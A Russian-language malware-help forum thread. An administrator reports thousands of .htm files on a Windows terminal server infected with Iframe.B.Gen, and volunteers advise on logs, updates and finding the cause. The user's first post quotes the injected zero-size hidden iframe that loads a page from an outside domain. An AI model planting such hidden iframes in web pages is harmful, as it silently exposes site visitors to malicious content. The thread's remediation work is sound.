-
Junior Member
- Вес репутации
- 40
Iframe.B.Gen найден NOD32
Нa Windows Server 2008 R2 64 Terminal антивирусом NOD32 обнаружено более 8000 .htm файлов зараженных Iframe.B.Gen
Визуально видно что к файлам добавлена строка:
p
<nofollow><iframe src="http://tsm.25u.com/local.html" width="0" height="0" frameborder="0"></iframe></nofollow>
1.Как почистить столько файлов без удаления?
2.Как найти виновника?
Помогите, pls!
hijackthis.log
virusinfo_syscheck.zip
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Уважаемый(ая) MaeXtro, спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
-
-
Логи делали из терминальной сессии ? Если да, то необходимо переделать непосредственно за компьютером.
- - - Добавлено - - -
+ Сделайте полный образ автозапуска uVS
-
-
Junior Member
- Вес репутации
- 40
Удалось сделать логи на сервере
-
- Проведите процедуру, которая описана тут. Ссылку на результат проверки напишите в сообщении здесь.
Сообщение от
MaeXtro
1.Как почистить столько файлов без удаления?
Антивирус сам блокирует вредоносные ссылки. Сайт tsm.25u... уже находится в списке вредоносных.
Сообщение от
MaeXtro
2.Как найти виновника?
1) Если это среверная платформа, не предназначенная для постоянного использования пользователями интернета непосредственно с самого сервера, то почему не стоит специально предназначенный для серверных платформ антивирус ESET File Security?
2) Предполагаю использование интернета непосредственно с сервера. Сопоставьте время обнаружения данных атак и журналов системы, кто был залогинен в тот момент на сервере.
+ Откройте файл ScanVuln.txt. Выполните из этого файла скрипт в AVZ. В результате работы скрипта будет создан файл - avz_log.txt.
Пройдитесь по ссылкам из файла avz_log.txt и установите все рекомендуемые обновления(если таковые будут).
Перезагрузите компьютер.
Снова выполните этот скрипт и убедитесь, что уязвимости устранены.
-
-
Junior Member
- Вес репутации
- 40
Продолжение
http://files.mail.ru/6F1D4B520AD542C1979FA312BBA14032
Сообщение от
mrak74
- Проведите процедуру, которая описана
тут. Ссылку на результат проверки напишите в сообщении здесь.
Антивирус сам блокирует вредоносные ссылки. Сайт tsm.25u... уже находится в списке вредоносных.
1) Если это среверная платформа, не предназначенная для постоянного использования пользователями интернета непосредственно с самого сервера, то почему не стоит специально предназначенный для серверных платформ антивирус ESET File Security?
Защитка оказалась слабовата
2) Предполагаю использование интернета непосредственно с сервера. Сопоставьте время обнаружения данных атак и журналов системы, кто был залогинен в тот момент на сервере.
+ Откройте файл
ScanVuln.txt. Выполните из этого файла скрипт в AVZ. В результате работы скрипта будет создан файл - avz_log.txt.
Пройдитесь по ссылкам из файла avz_log.txt и установите все рекомендуемые обновления(если таковые будут).
Перезагрузите компьютер.
Снова выполните этот скрипт и убедитесь, что уязвимости устранены.
-
Junior Member
- Вес репутации
- 40
-
Junior Member
- Вес репутации
- 40
Скрипт все время предлагает:
Несанкционированные цифровые сертификаты делают возможным подмену содержимого
http://download.microsoft.com/downlo...718704-x64.msu
а при установке система говорит, что уже обновлена
Извините лог не влез по размеру:
http://files.mail.ru/706C500FD7EA49A99650D85505F8FB7C